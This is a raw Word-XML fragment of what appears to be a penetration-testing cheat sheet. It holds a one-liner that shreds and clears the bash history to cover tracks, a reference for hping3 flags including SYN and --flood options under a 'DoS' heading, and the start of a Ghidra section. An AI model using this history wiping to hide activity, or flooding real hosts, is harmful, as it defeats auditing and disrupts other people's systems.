          <w:p w14:paraId="7F10C4ED" w14:textId="77777777" w:rsidR="00BB74E8" w:rsidRDefault="00BB74E8" w:rsidP="00BB74E8">
            <w:r>
              <w:t>A handy shortcut for the whole process in one command is:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BB74E8">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">shred </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB74E8">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">~/.bash_history </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB74E8">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>&amp;&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB74E8">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB74E8">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">cat </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB74E8">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">/dev/null </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB74E8">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB74E8">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB74E8">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">.bash_history </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB74E8">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>&amp;&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB74E8">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB74E8">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">history </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB74E8">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-c </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB74E8">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>&amp;&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB74E8">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB74E8">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>exit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00736CE4" w14:paraId="4270DFD0" w14:textId="77777777" w:rsidTr="00BB74E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF99FF"/>
          </w:tcPr>
          <w:p w14:paraId="470C60F4" w14:textId="77777777" w:rsidR="00736CE4" w:rsidRDefault="00736CE4" w:rsidP="00BB74E8"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFCCFF"/>
          </w:tcPr>
          <w:p w14:paraId="40F03919" w14:textId="77777777" w:rsidR="00736CE4" w:rsidRDefault="00736CE4" w:rsidP="00BB74E8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ACB405C" w14:textId="77777777" w:rsidR="00736CE4" w:rsidRPr="001E0F42" w:rsidRDefault="00736CE4" w:rsidP="00BB74E8"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49E8EC99" w14:textId="77777777" w:rsidR="00736CE4" w:rsidRDefault="00736CE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A606877" w14:textId="2362D8D1" w:rsidR="00834B5C" w:rsidRDefault="00B3003B" w:rsidP="00834B5C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Testing, DoS and Miscellaneous</w:t>
      </w:r>
      <w:r w:rsidR="00834B5C">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00834B5C" w:rsidRPr="00834B5C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hping3</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1067"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="722"/>
        <w:gridCol w:w="2372"/>
        <w:gridCol w:w="7933"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A6AF4" w14:paraId="51E5532F" w14:textId="77777777" w:rsidTr="004F00DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="ACB9CA" w:themeFill="text2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="489B4B12" w14:textId="7B1401D0" w:rsidR="005A6AF4" w:rsidRDefault="005A6AF4" w:rsidP="0043739D">
            <w:r>
              <w:t>161.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="089BCDDB" w14:textId="5BF7C5BD" w:rsidR="005A6AF4" w:rsidRDefault="005A6AF4" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>hping3</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>hping3</w:t>
            </w:r>
            <w:r w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> is already installed on Kali Linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76C07F6C" w14:textId="3D32CB4B" w:rsidR="005A6AF4" w:rsidRDefault="005A6AF4" w:rsidP="000E7B72">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>Hping3 is the advanced version of the ping command. Only ICMP is supported in ping, hping3 also supports protocols such as TCP, UDP, Raw-IP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A6AF4" w14:paraId="69F5DAFE" w14:textId="77777777" w:rsidTr="004F00DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="ACB9CA" w:themeFill="text2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="65B52324" w14:textId="7B2A8D9B" w:rsidR="005A6AF4" w:rsidRDefault="005A6AF4" w:rsidP="0043739D">
            <w:r>
              <w:t>161.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7111F996" w14:textId="77777777" w:rsidR="005A6AF4" w:rsidRDefault="005A6AF4" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DD6CCC5" w14:textId="77777777" w:rsidR="005A6AF4" w:rsidRDefault="005A6AF4" w:rsidP="0043739D">
            <w:r>
              <w:t>To use the command, simply enter hpin3 followed by an IP address, like such:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A708CF8" w14:textId="77777777" w:rsidR="005A6AF4" w:rsidRPr="00742D10" w:rsidRDefault="005A6AF4" w:rsidP="0043739D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00742D10">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00742D10">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> hping3 </w:t>
            </w:r>
            <w:r w:rsidRPr="00742D10">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">TARGET.IP.ADD.RESS </w:t>
            </w:r>
            <w:r w:rsidRPr="00742D10">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-c </w:t>
            </w:r>
            <w:r w:rsidRPr="00742D10">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11A0D292" w14:textId="406970EA" w:rsidR="005A6AF4" w:rsidRDefault="005A6AF4" w:rsidP="0043739D">
            <w:r w:rsidRPr="00742D10">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00742D10">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-c </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00742D10">
              <w:t>Send # of packets</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00742D10">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-p</w:t>
            </w:r>
            <w:r w:rsidRPr="00742D10">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00742D10">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Specify port number</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C04815B" w14:textId="5FE421D0" w:rsidR="005A6AF4" w:rsidRDefault="005A6AF4" w:rsidP="0043739D">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00742D10">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-S</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>SYN flag packet</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00742D10">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-d </w:t>
            </w:r>
            <w:r w:rsidRPr="00742D10">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Size of data to send</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005C400F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-F</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>FIN flag packet</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005C400F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-R</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>RST flag packet</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005C400F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-P</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>PUSH flag packet</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005C400F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-A</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>ACK flag packet</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D05F81">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-L</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D05F81">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Set TCP ack</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00654227">
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D05F81">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-x</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>More fragmentation</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D05F81">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-y</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Don’t use fragmentation</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005C400F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-U</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>URG flag packet</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005C400F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-X</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>X unused flag (0x40)</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005C400F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-T</w:t>
            </w:r>
            <w:r w:rsidRPr="005C400F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>Traceroute mode</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005C400F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-Y</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Y unused flag (0x80)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61078DF7" w14:textId="6FF13FC4" w:rsidR="005A6AF4" w:rsidRDefault="005A6AF4" w:rsidP="0043739D">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00276630">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-i </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00276630">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>u</w:t>
            </w:r>
            <w:r w:rsidRPr="00276630">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:tab/>
              <w:t>Interval to wait</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00654227">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--flood</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00654227">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Send packets asap</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C4C661B" w14:textId="5BC2111D" w:rsidR="005A6AF4" w:rsidRDefault="005A6AF4" w:rsidP="0043739D">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005C400F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-V</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Verbose more info</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00276630">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--beep</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Noise for every packet received</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A6AF4" w14:paraId="3DA0D50A" w14:textId="77777777" w:rsidTr="004F00DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="ACB9CA" w:themeFill="text2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="766CC3C5" w14:textId="16E9A890" w:rsidR="005A6AF4" w:rsidRDefault="005A6AF4" w:rsidP="0043739D">
            <w:r>
              <w:t>161.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="459F5161" w14:textId="77777777" w:rsidR="005A6AF4" w:rsidRDefault="005A6AF4" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C01D6F9" w14:textId="0D15B9FB" w:rsidR="005A6AF4" w:rsidRDefault="005A6AF4" w:rsidP="0043739D">
            <w:r>
              <w:t>The default scan mode is TCP, but this can be changed with the following flags:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005A6AF4">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-1</w:t>
            </w:r>
            <w:r w:rsidRPr="005A6AF4">
              <w:tab/>
              <w:t>ICMP mode</w:t>
            </w:r>
            <w:r w:rsidRPr="005A6AF4">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005A6AF4">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005A6AF4">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-0</w:t>
            </w:r>
            <w:r w:rsidRPr="005A6AF4">
              <w:tab/>
              <w:t>Raw IP mode</w:t>
            </w:r>
            <w:r w:rsidRPr="005A6AF4">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="005A6AF4">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005A6AF4">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-2</w:t>
            </w:r>
            <w:r w:rsidRPr="005A6AF4">
              <w:tab/>
              <w:t>UDP mode</w:t>
            </w:r>
            <w:r w:rsidRPr="005A6AF4">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005A6AF4">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005A6AF4">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-8</w:t>
            </w:r>
            <w:r w:rsidRPr="005A6AF4">
              <w:tab/>
              <w:t>SCAN mode</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005A6AF4">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-9</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Listen mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00742D10" w14:paraId="1AA9E231" w14:textId="77777777" w:rsidTr="004F00DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="ACB9CA" w:themeFill="text2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0ACABA79" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="0043739D"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1E6077C5" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75DF82CD" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRPr="001E0F42" w:rsidRDefault="00834B5C" w:rsidP="0043739D"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2829AB3F" w14:textId="665C11AB" w:rsidR="00B3003B" w:rsidRDefault="00B3003B" w:rsidP="00C364A5"/>
    <w:p w14:paraId="751EAB27" w14:textId="77777777" w:rsidR="00B3003B" w:rsidRDefault="00B3003B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAFF980" w14:textId="7D464EE3" w:rsidR="00B3003B" w:rsidRDefault="00B3003B" w:rsidP="00B3003B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Testing, DoS and Miscellaneous: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ghidra</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1067"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="726"/>
        <w:gridCol w:w="2368"/>
        <w:gridCol w:w="7933"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B3003B" w14:paraId="063B8E48" w14:textId="77777777" w:rsidTr="00182AB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="726" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="ACB9CA" w:themeFill="text2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="7BB87578" w14:textId="3E56471C" w:rsidR="00B3003B" w:rsidRDefault="00B3003B" w:rsidP="004B47EA">
            <w:r>
              <w:t>162.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2368" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
